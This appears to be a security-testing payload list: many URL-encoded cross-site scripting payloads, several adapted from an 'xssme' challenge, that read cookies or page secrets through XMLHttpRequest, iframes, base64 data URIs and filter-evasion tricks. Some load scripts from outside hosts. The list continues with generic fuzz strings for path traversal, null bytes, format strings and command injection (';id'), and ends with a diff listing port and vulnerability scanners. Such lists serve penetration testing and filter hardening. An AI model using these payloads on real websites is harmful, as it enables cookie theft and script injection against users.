<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>#
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
<script%20for=document%20event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script>%20var+x+=+showModelessDialog+(this);%20alert(x.document.cookie);%20</script>
|
||||
<script>%20location.href%20=%20'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';%20</script>
|
||||
<iframe%20src=%22404%22%20onload=%22frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22content.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22self.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22top.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<script>var%20x%20=%20safe123.onclick;safe123.onclick%20=%20function(event)%20{var%20f%20=%20false;var%20o%20=%20{%20isTrusted:%20true%20};var%20a%20=%20[event,%20o,%20event];var%20get;event.__defineGetter__('type',%20function()%20{get%20=%20arguments.callee.caller.arguments.callee;return%20'click';});var%20_alert%20=%20alert;alert%20=%20function()%20{%20alert%20=%20_alert%20};x.apply(null,%20a);(function()%20{arguments.__defineGetter__('0',%20function()%20{%20return%20a.pop();%20});alert(get());})();};safe123.click();</script>#
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<textarea%20id=ta%20onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;)%20autofocus></textarea>
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20id=iframe%20src=%22javascript:parent.x(window)%22><iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta%20onfocus=%22write('<script>alert(1)</script>')%22%20autofocus></textarea>
|
||||
<object%20data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20};%20open(%22javascript:opener.x(window)%22)</script>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
<iframe%20src=`http://xssme.html5sec.org/?xss=<iframe%20onload=%22xhr=new%20XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<a%20target="x"%20href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a%20target="x"%20href="xssme?xss=<script>var%20cl=Components;var%20fcc=String.fromCharCode;doc=cl.lookupMethod(top,%20fcc(100,111,99,117,109,101,110,116)%20)(%20);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe%20src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b%20name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<a%20target="x"%20href="xssme?xss=<script>find('cookie');%20var%20doc%20=%20getSelection().getRangeAt(0).startContainer.ownerDocument;%20console.log(doc);%20var%20xpe%20=%20new%20XPathEvaluator();%20var%20nsResolver%20=%20xpe.createNSResolver(doc);%20var%20result%20=%20xpe.evaluate('//script/text()',%20doc,%20nsResolver,%200,%20null);%20alert(result.iterateNext().data.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<a%20target="x"%20href="xssme?xss=<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20src=%22javascript:parent.x(window);%22></iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'.',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
Garethy%20Salty%20Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(),%20'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
<a%20href="javascript:\u0061le%72t(1)"><button>
|
||||
<div%20onmouseover='alert(1)'>DIV</div>
|
||||
<iframe%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20onmouseover="prompt(1)">
|
||||
<a%20href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<embed%20src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">%20?
|
||||
<object%20data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<var%20onmouseover="prompt(1)">On%20Mouse%20Over</var>?
|
||||
<a%20href=javascript:alert(document.cookie)>Click%20Here</a>
|
||||
<img%20src="/"%20=_="%20title="onerror='prompt(1)'">
|
||||
<%<!--'%><script>alert(1);</script%20-->
|
||||
<script%20src="data:text/javascript,alert(1)"></script>
|
||||
<iframe/src%20\/\/onload%20=%20prompt(1)
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<svg/onload=alert(1)
|
||||
<input%20value=<><iframe/src=javascript:confirm(1)
|
||||
<input%20type="text"%20value=``<div/onmouseover='alert(1)'>X</div>
|
||||
http://www.<script>alert(1)</script%20.com
|
||||
<iframe%20%20src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>%20?
|
||||
<svg><script%20?>alert(1)
|
||||
<iframe%20%20src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<img%20src=`xx:xx`onerror=alert(1)>
|
||||
<object%20type="text/x-scriptlet"%20data="http://jsfiddle.net/XLE63/%20"></object>
|
||||
<meta%20http-equiv="refresh"%20content="0;javascript:alert(1)"/>?
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<embed%20code="http://businessinfo.co.uk/labs/xss/xss.swf"%20allowscriptaccess=always>?
|
||||
<svg%20contentScriptType=text/vbs><script>MsgBox+1
|
||||
<a%20href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')%20worksinIE>
|
||||
<script>~'\u0061'%20;%20%20\u0074\u0068\u0072\u006F\u0077%20~%20\u0074\u0068\u0069\u0073.%20%20\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script%20U+
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script%20a=\u0061%20&%20/=%2F
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script%20????????????
|
||||
<object%20data=javascript:\u0061le%72t(1)>
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<script%20itworksinallbrowsers>/*<script*%20*/alert(1)</script%20?
|
||||
<img%20src%20?itworksonchrome?\/onerror%20=%20alert(1)???
|
||||
<svg><script>//
confirm(1);</script%20</svg>
|
||||
<svg><script%20onlypossibleinopera:-)>%20alert(1)
|
||||
<a%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20%20aaaaaaaaa%20aaaaaaaaaa%20%20href=javascript:alert(1)>ClickMe
|
||||
<script%20x>%20alert(1)%20</script%201=2
|
||||
<div/onmouseover='alert(1)'>%20style="x:">
|
||||
<--`<img/src=`%20onerror=alert(1)>%20--!>
|
||||
<script/src=data:text/javascript,alert(1)></script>%20?
|
||||
<div%20%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20%20onmouseover="prompt(1)"%20onclick="alert(1)">x</button>?
|
||||
"><img%20src=x%20onerror=window.open('https://www.google.com/');>
|
||||
<form><button%20formaction=javascript:alert(1)>CLICKME
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<object%20data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<iframe%20%20src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<a%20%20href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click%20%20Me</a>
|
||||
"><img%20src=x%20onerror=prompt(1);>
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"><script>"
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%00
|
||||
%00/
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%0a
|
||||
%20
|
||||
%20|
|
||||
%2500
|
||||
%250a
|
||||
%2A
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C%3F
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
|
||||
|
||||
|
||||
|
||||
'
|
||||
";id"
|
||||
(')
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*|
|
||||
+%00
|
||||
-
|
||||
--
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
..\
|
||||
/
|
||||
/%00/
|
||||
/%2A
|
||||
/'
|
||||
/'
|
||||
0
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1.0
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
;
|
||||
<%20%20script%20>%20<%20/%20script>
|
||||
<?
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
TRUE
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\t
|
||||
^'
|
||||
^'
|
||||
`
|
||||
id%00
|
||||
id%00|
|
||||
null
|
||||
something%00html
|
||||
{'}
|
||||
{'}
|
||||
|
|
||||
}
|
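--- a/src/target_list
+++ b/src/target_list
@@ -0,0 +1,18 @@
+
+Port scanners:
+
+Nmap
+Angry IP Scanner
+Superscan
+NetScanTools
+Unicornscan
+
+Vuln. scanners:
+
+Carrier
+Nessus
+Metasploit pro
+Acunetix
+Appscan
+Netsparker
+Grendel Scan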